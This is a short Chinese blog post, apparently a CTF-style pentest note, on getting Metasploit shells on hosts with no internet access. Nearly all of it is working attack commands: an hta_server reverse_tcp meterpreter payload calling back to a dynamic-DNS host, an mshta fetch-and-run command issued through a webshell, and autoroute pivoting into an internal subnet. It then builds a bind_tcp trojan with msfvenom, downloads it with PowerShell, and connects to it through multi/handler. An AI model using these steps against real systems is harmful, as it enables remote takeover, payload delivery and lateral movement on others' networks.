【远控使用】metaslpoit不出网上线

2021-09-08 | CTF | | | 257

hta_server模块使用

use exploit/windows/misc/hta_server
set target 1
set payload windows/x64/meterpreter/reverse_tcp
set SRVPORT 80
set lhost ad39402345.wicp.vip
set lport 26240
run

接着在webshell中执行来web传递

mshta http://ad39402345.wicp.vip/Q2Uo0sNe.hta

接着用来添加路由

run get_local_subnets
run autoroute -s 192.168.186.0/255.255.255.0
run autoroute -d -s 192.168.186.0
bg

然后在该联网主机上建立web传递

再用断网主机访问mshta就行了

Proxychains实现bind连接

接着上面的加一个proxy

生成一个木马

msfvenom -p windows/x64/meterpreter/bind_tcp lport=443 -f exe > bind.exe

利用webshell上传

接着用不出网的主机powershell下载这个bind.exe

$client = new-object System.Net.WebClient
$client.DownloadFile('http://10.0.1.4/payload.exe','C:/test.exe')

接着执行就可以发现443开始监听了

接着bind连接进去

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.186.4
set lport 443
exploit

远程连接命令mstsc(microsoft terminal server client)

我的个人博客

孤桜懶契：http://gylq.gitee.io